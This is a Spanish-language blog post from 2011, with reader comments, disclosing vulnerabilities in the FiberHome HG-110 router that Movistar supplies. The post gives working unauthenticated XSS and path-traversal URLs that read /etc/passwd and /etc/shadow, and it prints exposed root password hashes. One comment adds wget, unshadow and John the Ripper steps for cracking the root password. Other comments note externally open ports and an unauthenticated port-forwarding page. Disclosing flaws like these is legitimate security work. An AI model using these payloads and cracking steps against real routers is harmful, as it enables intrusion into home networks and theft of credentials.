En algunos paises, Telefonica/Movistar entrega a sus clientes un router FiberHome HG-110, uno blanco y con dos antenitas:
Las vulnerabilidades que he encontrado son:
Cross-Site Scripting: http://router.internal.ip:port/cgi-bin/webproc?getpage=%3Cscript%3Ealert%28this%29%3C/script%3E&var:menu=advanced&var:page=dns
Local File Include and Directory/Path Traversal: http://router.internal.ip:port/cgi-bin/webproc?getpage=../../../../../../../../../../../../etc/passwd&var:menu=advanced&var:page=dns
Para poder explotar estas vulnerabilidades no es necesario estar autenticado.
Informacion del dispositivo:
HardwareVersion : HG110_BH_R1A SoftwareVersion : HG110_BH_V1.6 Firmware Version : 1.0.0
No descarto que estas mismas (y otras) vulnerabilidades puedan afectar a otros modelos del mismo fabricante.
ACTUIALIZADO El httpd se ejecuta como “root” (mini_httpd) por lo que es posible acceder, mediante LFI, a archivos con esos privilegios.
$ wget -o /dev/null -O – “http://192.168.1.1:8000/cgi-bin
/webproc?getpage=../../../../../../../../../../../../etc/shadow&
var:menu=advanced&var:page=dns”#root:$1$BOYmzSKq$ePjEPSpkQGeBcZjlEeLqI.:13796:0:99999:7:::
root:$1$BOYmzSKq$ePjEPSpkQGeBcZjlEeLqI.:13796:0:99999:7:::
#tw:$1$zxEm2v6Q$qEbPfojsrrE/YkzqRm7qV/:13796:0:99999:7:::
#tw:$1$zxEm2v6Q$qEbPfojsrrE/YkzqRm7qV/:13796:0:99999:7:::
~ $ ps ax|grep httpd
509 root 4212 SW /usr/sbin/mini_httpd -d /usr/www -c
/cgi-bin/* -u roo~ $
21 respuestas hasta ahora ↓
1
raziel9854
// Abr 8, 2011 a las 1:28 pm
gracias x la info… hay q ver q otras vulnerabilidades posee… xD
2
Brujo
// Abr 16, 2011 a las 8:32 pm
$ ps ax|grep httpd
lo ejecutas en el router??? tiene una cuenta ssh??
3
Zerial
// Abr 16, 2011 a las 8:52 pm
Hola Brujo:
Si, tiene cuenta ssh. Es un linux con servicio ssh
4
Brujo
// Abr 18, 2011 a las 9:14 am
gracias! muy buena info
5
Maztor
// Abr 25, 2011 a las 2:08 pm
Una Correccion, las vulnerabilidades se pueden realizar de forma remota si el usuario esta Autenticado, de forma local Tambien necesita Autenticacion. ya que este solo puede ser visible con un logueo posterior.
POSIBLES RAZONES.
1- los Router los FIXEARON!
2- al realizar el Analisi pudistes dejar configuracion guardada sin Ninguna intencion por eso pudo Haberte surgido la explotacion sin Autenticacion.
Saludos! y Beuna Info!
6
Maztor
// Abr 25, 2011 a las 2:10 pm
Segun mi Analisis, una posible solucion para evitar esto de forma remota seria abrir puerto 80 y hacer redireccionamiento a localhost definido sin uso del usuario, asi e atacante no podria sacar la interfaz de forma siple y generaria una confusion de.. Sera que tiene ftth o no?.
Espero les Sirva.
7
Zerial
// Abr 25, 2011 a las 2:11 pm
Hola Maztor:
Las pruebas las hice con la config default, simplemente sacandolo de la caja y conectandolo a la corriente.
8
pperson67
// May 1, 2011 a las 10:03 pm
Este router utiliza chipset Realtek (procesador RTL8672 adsl RTL8271B) con 32 Mb. de RAM y 8 Mb. de FLASH y es muy similar en hardware al HUAWEI HG532C comercializado en España. Seguramente pronto habra novedades respecto a mejorar su firmware…
9
club penguin cheats
// Ago 23, 2011 a las 11:56 pm
good point ^^
10
infernal
// Ago 26, 2011 a las 7:14 pm
como se llaman los cables que parecen coaxial de las antenas
y como es su configuración del hadware
11
Zerial
// Ago 27, 2011 a las 2:55 pm
Se refieres al pigtail ?
http://www.gccomputacion.cl/productos/CABLE%20PIGTAIL.gif
12
r4c3
// Ago 29, 2011 a las 2:50 pm
muy interesante informacion y hay mas router que tienen pifias pero estas pifias surgen donde el firmware es modificado por movistar chile para dejarnos las conexiones como las weas xD
13
leonciokof
// Oct 4, 2011 a las 5:01 pm
¿Como accedo via ssh?, ¿con que usuario y contraseña?, ¿son las mismas cuentas del acceso web?
Yo tengo acceso via web al router, me gustaría saber como lo hago para la conexión ssh.
Gracias.
14
Zerial
// Oct 5, 2011 a las 4:28 pm
Hola leonciokof: En mi caso el acceso ssh era usando las mismas credenciales que via web (la de admin)
15
Claudio
// Oct 9, 2011 a las 3:43 am
Por defecto viene el puerto 443 (https) abierto para el exterior… uno puede desde afuera acceder a la configuración básica (donde se elige la clave wifi) sin necesidad de estar conectado a la red. Lo detecté con ShieldsUp! Mi solución fue hacer forward del puerto 443 al puerto 8765 (ese puse en mi caso) a la ip 192.168.1.1, usando la dirección (que tampoco requiere login) http://router_ip:port/cgi-bin/webproc?getpage=html/index.html&var:menu=advanced&var:page=portforwd
16
Claudio
// Oct 9, 2011 a las 3:58 am
Encontré además que se puede acceder al puerto 8000 desde afuera :S, hay que hacer forward también a ese puerto.
17
AT-HE (atesin)
// Oct 24, 2011 a las 4:31 pm
para obtener la contraseña de root podrian usar la misma vulnerabilidad encontrada por zerial para luego crackearlas con john the ripper como dijeron mas arriba desde otra maquina (offline cracking)
# obtienen el archivo passwd y el archivo shadow
wget “http://192.168.1.1:8000/cgi-bin
/webproc?getpage=../../../../../../../../../../../../etc/passwd&
var:menu=advanced&var:page=dns”
wget “http://192.168.1.1:8000/cgi-bin
/webproc?getpage=../../../../../../../../../../../../etc/shadow&
var:menu=advanced&var:page=dns”
# instalan el john the ripper, luego “juntan” los dos archivos
unshadow passwd shadow > fiberhome.pwd
# luego tratan de crackear este nuevo archivo por fuerza bruta, les recomiendo hacerlo en alguna maquina potente si tienen acceso
john -incremental:lanman fiberhome.pwd
18
Joao Paulo
// Oct 30, 2011 a las 9:35 am
Someone could decrypt the root password?
19
Zerial
// Oct 30, 2011 a las 5:01 pm
hi Joao Paulo:
You can use a brute-force script to crack the shadow. Is not the same password at all.
cheers
20
Vulnerabilidades en FiberHome HG110 e implicancias para Movistar | SPECT Research // Feb 22, 2012 a las 2:28 am
[...] , en abril de 2011, difundió vulnerabilidades del tipo Local File Include y Cross Site Scripting en el router [...]
21
Ivan
// Abr 27, 2012 a las 3:55 am
Hoy iba caminando y me encontre ese mismo router botado en la calle xd y taba bueno… xd
Deja un Comentario